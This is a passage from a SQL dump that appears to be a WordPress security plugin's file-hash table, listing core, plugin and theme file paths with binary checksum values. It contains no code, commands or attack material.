��(觨:pR�/','wp-includes/class-walker-nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��F��u��]�/aE','���&u�f�|�d�H��؈iDn�^f�R\"TGd�','',0,'?'),('���[Kl���f#\r��','wp-content/themes/hitmag/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި஄UPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('�����0��[��\\6','wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V��Z�����','6,��k}��J�U��a<�d�8�4�?��̾(','',0,'?'),('��(5�aH�yo,X�','wp-includes/js/jquery/ui/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@}����݃O�S�','J���G�T���(���\'��O�&��7g�����e','',0,'?'),('����}��p�u�1\"�\n�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/SetCookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�2*�-��L<�d�','��b�l^\0�]V�	q>�Tϐ��`{^�j�0','',0,'?'),('��\r� ��\'�;�2�','wp-content/plugins/wp-cerber/assets/flags/cx.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4@/��e�^��&c','��ȁs���׼�{K&Cws:y외��|�(!�','',0,'?'),('�s���	���ؤ��','wp-includes/class-wp-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9Zc��*\ZR{r�5C�','v����G�ۏ�.ʐɭǞOi�YW��l\n���','',0,'?'),('�/7�ñ�cx��p��g','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o٫+����J�ٽvE','bIn�\'\nS*��/�\r�?��\'�\r7�+���h��','',0,'?'),('���ڥ�^i�$��&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��\0����իw6�','7�6��ay��5�?}%.]����؞u���S�','',0,'?'),('� ��:�{�wL�','wp-includes/wp-includes/js/dist/data-controls.js',0,'����:�ԕw$ބ�j','����:�ԕw$ބ�j','�a���95�]��ꐺW�e+,�O��� &�u','',0,'?'),('�$�͓�bHn��,\0-','wp-includes/images/smilies/icon_confused.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/#	�Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('�,�t��!O\0�PR���|','wp-content/plugins/redirection/images/GitHub-Mark-64px.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�\',_�Jm�M>KŽ','/\rTAY��م��ѻ���v�g�>�!Eh','',0,'?'),('�-��췓��9�ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xw���Tg���A}�\n','�k�cQx�e�˳`=n6�X5y��dz5u]WB\'','',0,'?'),('�5��8���T5��-','wp-content/plugins/wordpress-seo/src/helpers/require-file-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�z�2M4����','����.�k�����=@[9�W��P+|���8�','',0,'?'),('�7K�!(�t�4��b�','wp-content/plugins/wordpress-seo/src/builders/indexable-author-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�w�i#b{���?�','������;ᅇM�Q~~��Ș�G�v䀴�o','',0,'?'),('�N��ZND��N�>Y	','wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����<�/������','#��n#B�+��Ga\Z�Iû��K;w>WX�P���','',0,'?'),('�s�$��lA�F-��^��','wp-includes/blocks/group/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\	�ʝ�=�fZ9U','�\ri�$y+�h�?����j魾\Z���b3�sJ)','',0,'?'),('�v6��?��,v�(B>','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-forminator.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�ޭ��9L~.\"��M{','C���U҂A��Fn�\0���y��G���&K�L�','',0,'?'),('�{4�.������#�#','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B<�<��LU�:uUn','�ZІ��\\�@@�G��P��#=|�\'k4��','',0,'?'),('�ܰ����_~�h	sc','wp-includes/blocks/spacer/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���SU���<N���BM','JD�$��֎�]V�NuƒδoB�i��W���_�','',0,'?'),('��c�1�;��!�oe','wp-includes/blocks/post-author/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Bpx�5o@!tV�P+','�I�9Da<��#6\Z�<.��i�׊-�xF��R�','',0,'?'),('���c��<�<�7�P','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/font.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 1ǡ;I�pi|\'���','�����\"��\"a��?���,��{#��\':\0 {6r','',0,'?'),('��2[6�������','wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections/class-kirki-sections-expanded-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kdyp嫁\n#�ǞЮ�','1��9�\'�Fc��B��B�_��9Z8)����1�','',0,'?'),('�Ǫ�|�0����g��4�','wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-5.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ᢋ!A�Œ��L5Κ+','�q}u(�X�\\C�t�(Y\rcM�)gJ/n�G��','',0,'?'),('��pBr��\0�U	B��R�','wp-includes/blocks/require-dynamic-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�O˟����;�B�','E����_GX��-�2�D�.�w�~�LxL��Cb','',0,'?'),('��LMr����n����','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/initialize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B%r���ի�R>�',' ��>�u�}!Swy�^�eA�@�|�δA�','',0,'?'),('��v\'j@�-��*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('����Ӡx��@A��','wp-content/plugins/wordpress-seo/src/wordpress/wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�a6%4s���d�4�','s����B��Hf�	�Q�`�k0E�n�j','',0,'?'),('����X���-��Of','wp-includes/blocks/nextpage/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;(\nw1���6\nO�','�}{��pe�0�9\r��n�L]tJ��:�R��~','',0,'?'),('����^�t�i�Gi��l','wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php',0,'�8�l��_\r�u���','�8�l��_\r�u���','��פme�,��V����9�}����	y���v�','',0,'?'),('�\n]Eg���7Oq�b��','wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���$�\n�X��\'(','a:!����XA�2Y�[n\n��e���,�A�SI�$.','',0,'?'),('����n��j�P�+��','wp-admin/includes/class-custom-image-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F}٩L}��e�ق�','���|o`�ڡ�:6ԅ���,>D���.T9��T','',0,'?'),('�\Z�������Bi/6�','wp-includes/js/jquery/ui/effect-clip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2\"��_V��_����','���n��eT�%~4G���f���#�ᅨ�+','',0,'?'),('��-&)��I�j\0~9�','wp-content/plugins/wp-smushit/app/assets/images/vline.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O*j㤡���]���','�ʪ��5�j[J׉�if�j��Zۙ���jy9�','',0,'?'),('�$�%\'a˭����','wp-content/plugins/wordpress-seo/src/repositories/indexable-hierarchy-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n+��ʃ���o(1�','�B�O/�<���暵�R�z�N}�E<5��+1���','',0,'?'),('�*���E��C�	�|2','wp-includes/wp-includes/js/hoverIntent.js',0,'��z/P���ꮱ<	�','��z/P���ꮱ<	�','t��neTR/�77�@\Zҧ0�g�nj����','',0,'?'),('�1=E`� B�?(�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/nb.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>U?�Ws=���^�','�–��\0~lՁ����W^)|��g(t�w1A','',0,'?'),('�2=�C��[���v��^','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V��*]l�v�c��','z�|���RU�sU��K\Z�����2�<d#��;���','',0,'?'),('�8u7�h@jx�\"�5','wp-includes/class-wp-block-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�	?y�r��o���','U���5\nݤ�e�=�㢬�)��UFm��	jf','',0,'?'),('�8B�=LZK���#`�l�','wp-content/themes/hitmag/inc/kirki/modules/css/property/class-kirki-output-property-background-position.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\\�]����$�\\�.��','^ѣ�T}�/&��ӷ�Ә�E\'_�jr�f�=���','',0,'?'),('�L���yE�{��f�','wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('�g�bf�\r\Z��ъ�','wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��B\r������+�','�wSa��0\n�2�&g��M��d����\'�<��I_','',0,'?'),('�k�UL��ǡ�$���','wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]�*C�u�\0�','e�s}k�_��q}���~G���[�5�Q�u�!�','',0,'?'),('�rn�`	m��$\0��V','wp-includes/blocks/media-text/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��\"���\\�','8I��#�\n���=mM�W���ḑ���J���s\0','',0,'?'),('��g�!��ٺ�!���*�','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-server-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-$lW�:����c�=','�z\0D4S�И�!�V�a�g,���������','',0,'?'),('��	�Xb�B�y#��','wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����/��R�Wϳ*^','8I\'o,��iE�����𷐟;F�ٻ��~�','',0,'?'),('��=��-Xԍn{]�pf','wp-includes/js/wp-embed-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f%W�^m�y���4$','��)������A�r�\rt���@��j��Y����','',0,'?'),('��we�i!<��s�y\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h8�FK�3Eq�s����','�0�T���E�Va~\'55h4��o՞�{Mɱ��\'','',0,'?'),('���\\.98�8�R��c','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cǻt�?R�	�v���',']�x�\ZDZ��~�٘BػM�²�\"m��/΢w�','',0,'?'),('��$��D[�ֺ,�d��','wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js',0,'6�\'1�Z����f ','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('�����۝w6Uu%��','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('��\\����JRَ�nx','wp-includes/blocks/navigation/view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�I�l+�*=+�n$','����m(1�A�a\\�q��.٤Rj6���','',0,'?'),('���fSu�B�ͥ?^yO','wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r5C��y>\Z�x�w','$�\\���߻W9��R�Q�zA��r\021�{','',0,'?'),('��c�~�����','wp-content/plugins/wordfence/css/license/response-variables.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('����{^��W����C�','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���Ϲ�O��o��','���u�)��\ZqU���(��b��v���G�}��','',0,'?'),('��+T��6��؃N�','wp-content/plugins/wp-cerber/assets/flags/ke.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E�E��<_�&e7F3','���B�oߪ�ð�QI��lO�F�.:�p�','',0,'?'),('���-�]�\r�~(#�','wp-content/plugins/wordpress-seo/admin/class-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����cg�T��r�@','���é��\"\Z��>����>���cװ����P','',0,'?'),('��Ç���JV�W�]I�','wp-includes/blocks/table/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŦkZ� ���<e','Q���Y�+Xg��.�}�\rPT�?Ւ�	�mAݽ��','',0,'?'),('�� �L��wO�d98A�7','wp-includes/wp-includes/class-wp-session-tokens.php',0,'9]�K�UJW�*��h�=','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j򬪎$M��0�\0','',0,'?'),('���i��6̰�S�','wp-content/plugins/wordpress-seo/src/conditionals/open-graph-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^$ڼ�]e׏�\nS+^�','EHh�>��{�#q?���{\Z�Sv�D�A�WB�','',0,'?'),('�هi`\0�y+�Cb','wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���l,q�_��','�Y]�76oJ�R�E�ry�:�+�n�����','',0,'?'),('�߽s�h�>0�\n�+4q','wp-includes/wp-includes/js/dist/i18n.js',0,'\n|7�>&���~�','\n|7�>&���~�','�W\n��U,���5��m�_7�qv�L-�K��P%','',0,'?'),('��$[��tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Qt��z��Q����\"','}�؟Zl�(y��0�Ũz�7{�d6Ynrh��\\','',0,'?'),('���Nt��\\�uZpK�0','wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"u(����羉��B�','K��iB30J\0oe�:�P`��D�z�;nλ\'��','',0,'?'),('�m5��u����1}�','wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��c[�DGƹ���\Z','��x��.����6u��i�p���HG@�v�\0','',0,'?'),('��&B�5V�AUU,��','wp-includes/class-wp-http-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','29U�:H�2\ro��pI','G�щ[��_\\�Zo쥓~=��B���%?�牢҈','',0,'?'),('�%J���{aTx��2','wp-content/plugins/wordpress-seo/src/integrations/blocks/abstract-dynamic-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�6b�y��Ý�ݐ','��\n�$\n^����U�#�|�}��X��E��	','',0,'?'),('�1A��bȱ��8��EN','wp-includes/blocks/group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�g7�n6�*`tn','T5�>��� i�A9�\\��AoLD�Ed��˰�','',0,'?'),('�@`W�}�L��&S','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-radio-buttonset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l&��W��8�7����','0;7}��Mb$톀���H��k\n%!�ѐ�\n1�','',0,'?'),('�@��3���1��Ô','wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php',0,'�	�sL2/�B�����','�	�sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('�KG�����=]�F\0','wp-includes/wp-includes/js/dist/wordcount.js',0,'�T/�mWeP�X<x�}�t','�T/�mWeP�X<x�}�t','��[:�{A�I��BY��C&���Op\'6�','',0,'?'),('�_f��;w�a��ځ�','wp-includes/js/tinymce/skins/wordpress/images/gallery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�nUd��4��W���','wp-content/plugins/wp-smushit/app/assets/images/opera-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�ߺqzu7����','�@Xk��v[3a����\\9�����0��f%�;','',0,'?'),('�u��<e�x��@ֈˆ>','wp-includes/js/underscore.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W �EN����V�k','���e�q�)j�\r���2w�-%v��������','',0,'?'),('�zub�d��3��_T�?','wp-content/plugins/wp-cerber/cerber-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Ş��L�-�FmFv��7','}#�a9@>�F5���}E$æ���ڴ�פJ�','',0,'?'),('�z�&p��_���v�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/notices/spring.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l>�j꾜�QY','d���lUm��&IE��9x� (^�ٮ�Q�','',0,'?'),('���])T�����N25F�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c��?qt�','֝Rz5B�,��nɲ�����\nHoڨ��|','',0,'?'),('��q?%�rp��0�7�q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&4��|�����:��]','��Px�%�nuz���Y#���;$.Ǹ`���IA','',0,'?'),('�����C�	#a��S�[','wp-includes/sodium_compat/lib/stream-xchacha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����^=�$��T���','/~U�]��Nn�<!��\"�Fm�����7�*\0r','',0,'?'),('����t�:���Z\0�','wp-content/plugins/wordpress-seo/admin/import/class-import-detector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�r����\r�&','Hvx�i�%��Y.��5�	�_���~T�K\r�.','',0,'?'),('�����,/r�]��1S','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��>>Q���lh���','wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',0,'+\r��Π;K�۔�b/�','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=�	���Tc�vL\n*Ȱ','',0,'?'),('����Ԅ�w��>','wp-content/plugins/wp-cerber/assets/flags/tz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H2�_X4�����','N����q�\n@YpX�lZ�xq����j','',0,'?'),('��-[����S�_عQ�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:��!�G~�q�ic','^�DCguPT!>����W��\Z���k�~_5\n8','',0,'?'),('��zvo:���B%���','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�h���%u-C�\0�','\"Y¤&6HU�^��\'�$���=_;>����','',0,'?'),('����x�Й�)DC��<','wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�~G~�Ԟ�','�h�3XVx�p��T��OS‘Sfb��\r�E捵�','',0,'?'),('�	����h��16\"S��','wp-includes/blocks/comments-pagination/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*��.�~��oy^���','sdz\"��m_��e�����N]�63k�0s&�','',0,'?'),('�\nǷ�J�A�He�qnQ�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',0,'����!�Й�~L�C��','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('�~����U�\"�&��','wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('�t�~������*�ֆ','wp-includes/blocks/page-list/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��H�ܥ��R.!q�','�w\n�Z�{C�D=\r%֚��$Z�1dwqyI�(','',0,'?'),('��W2��D��G�7�V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�U���f��q���','\"�I���f���� Q�n�;w�VQ�kP4f+�','',0,'?'),('��M��~\n�T|�','wp-includes/js/mediaelement/wp-mediaelement.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꕂv��EK�‡?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('�%+le2�;�gQ��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ru.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F#�;���K�)�e��','�(�rXa��,�����k+��@�L���<���','',0,'?'),('�8痣4���J����','wp-includes/wp-includes/images/smilies/icon_smile.gif',0,'��3�.)�2���p���','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('�=��X<;��r@��','wp-includes/wp-includes/pluggable-deprecated.php',0,'@���\"�j��2�ߖ','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('�H駖�P�at �V�\'e','wp-content/plugins/redirection/redirection-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۫A�lKX��}i�%F','�^t��x�3f���2ZH�QA��H�����','',0,'?'),('�Q��@O?�S�\r��9�','wp-includes/wp-includes/js/jquery/ui/tooltip.min.js',0,'a�\r��c5V����h','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('�V[s)R��@3,®�','wp-content/plugins/redirection/locale/json/redirection-es_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1F��VA�)t�L�pB','CKﻪ�*ƴ�S�K�� �����{�sFt%T�','',0,'?'),('�Vb(kt�W\"�6(;ƴ�','wp-admin/includes/class-wp-media-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dz�a\r���m. ','�f?���s;ֵ����Wɩ�q	Ïw�=��','',0,'?'),('�iȜ�1��\0���8','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S;h8�^��g�R','��m�fʬ�����S�XT����8��A�-�g�','',0,'?'),('�tfF	�r{�܇�_I�x','wp-includes/SimplePie/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ج�8\rʝ���Y �','��ў��K��f�\'��?�=�O��nư�^�','',0,'?'),('�|]�D��\Z.�E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�ꫯ�y�5�pc','0(��5D�=U��Ԕ~���ڈI\")�7h','',0,'?'),('����,�=�(���','wp-content/plugins/wp-smushit/app/pages/class-nextgen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{r��^K\'ps��z�','�;�\0����C�ƆwNxM�֚X[ƟsdJv��','',0,'?'),('��5e-8\Z��Ι98','wp-includes/wp-includes/class-wp-metadata-lazyloader.php',0,'I^�P���;$�+\"�','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('���N-�q���\0��','wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\r�)�oF','�T�%�bu�I�|��\\�/��+7^f\\�RIۄ','',0,'?'),('��o|��lP�=�Q��I','wp-includes/wp-includes/class-wp-locale-switcher.php',0,'��\"�?�F�w,�T��','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('�Ŏ��O�NJ�`','wp-content/plugins/all-in-one-wp-security-and-firewall/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��\0�Rj�DA A���','wp-content/plugins/wp-cerber/assets/flags/qa.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��?��\0|t�r','�\0�TI.z�{=4u�ܗ�c&˾�mlL�','',0,'?'),('�ςHv���#,ײ/�7','wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js',0,'�?�~s���i6G�/','�?�~s���i6G�/','��{����w��-\r����zF�v_��\\wf���','',0,'?'),('��$��|{�%�M6���','wp-content/themes/hitmag/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R:�b�����wг�Y','��ı\"�[���W����0-�#Wﳷ��l���','',0,'?'),('��;\\�V����AޅRd','wp-includes/wp-includes/customize/class-wp-customize-theme-control.php',0,'�	�K���WTՂ�c�','�	�K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��v��+�k�N�','wp-content/plugins/wordpress-seo/src/conditionals/front-end-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��xȭ�i��3c','AQ�������O�l��b��f���J����','',0,'?'),('����\r�$�i�J��O�X','wp-content/plugins/wp-cerber/assets/flags/hu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��jr�s�?_m�','�܂Y~h^��A�$�U�NJ�u���u��1��','',0,'?'),('��߲;��0����','wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('������/�n����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r]��^g��\Z�/]T��','�y�涩�x���Ƞa}���s矛���+�br)','',0,'?'),('�!�-LHv�)��n��#','wp-includes/https-detection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���G��w�KW�','�\Z~e5s(G��w�>��.o`a�K�Sd�','',0,'?'),('�(�`hqQ`~�X��','wp-content/plugins/redirection/matches/login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SS:?l���]�\0��h','���g��FP-�Qlk��������T7Ŋ�','',0,'?'),('�05��o��n��cA:(','wp-content/plugins/wp-cerber/assets/flags/br.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��,ء,�����.6','�OD�uj��?U�E�u����C0��t%Y�','',0,'?'),('�4$����\r#s7\Z��]','wp-includes/wp-includes/css/dist/block-library/editor.css',0,'0>>�~��u��WlY','0>>�~��u��WlY','�\n�:�n�ޒY�Z�[�I	���g\0�����a�B','',0,'?'),('�87�>�/�NTZ��y�v','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/km.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V����lR�F��ʜ�','�-UF� c�\"�ǧi?�<��y���|~�\\ơS���','',0,'?'),('�<��g�=�C�״qD','wp-includes/customize/class-wp-customize-themes-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���몈Fb�\\)��L','҉s:.i�<2��ޖ���C!��U�(<�[�T`','',0,'?'),('�KI\'Q��H}M�F��','wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js',0,'��_�vQ8_�$�?��','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('�Ndw\n��b��:�H$�','wp-content/plugins/wp-smushit/app/views/dashboard/upsell/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\J1�&��3R�՚�\0','����EO�|�R�#�u���tJ����m���','',0,'?'),('�PC<��	���vn�R8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@cI�����','��Y��=������RB�)	~���